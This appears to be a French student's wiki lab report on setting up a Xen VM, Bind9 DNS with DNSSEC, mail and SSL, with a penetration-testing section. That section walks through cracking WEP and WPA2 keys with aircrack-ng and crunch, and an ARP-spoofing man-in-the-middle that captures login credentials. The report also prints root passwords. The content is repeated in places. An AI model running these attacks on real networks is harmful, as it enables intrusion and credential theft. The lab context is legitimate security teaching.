Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]
 

On constate que on resoit bien les message en provenance du mail de Polytech.
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'

Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande <code>admin:root</code>
On crée ensuite un <code>newaliases</code> puis on restarte bind9 avec la commance <code>service bind9 restart</code>

Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.

====Envoie du SSL Certification Gandi====

Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.

[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]
 

Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'

Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|texte descriptif]]
 

quand on utilise le ssh on passe par le port '442' dans le fichier <code>/etc/apache2/sites-available/default-ssl.conf</code>
On ajoute les lignes suivantes :

SSLEngine on
SSLCertificateFile /root/glopglop.site.crt
SSLCertificateKeyFile /root/myserver.key
SSLCertificateChainFile /root/GandiStandardSSLCA2.pem

On reboot le service apash2 pour qu'il prenne les modification en compte.

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

Fichier:Gandi-téléchargement clefetcertifica mirage.png

2020-11-20T09:48:23Z

Aglaine :

TP sysres IMA2a5 2020/2021 G5

2020-11-20T09:42:54Z

Aglaine : /* Envoie du SSL Certification Gandi */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

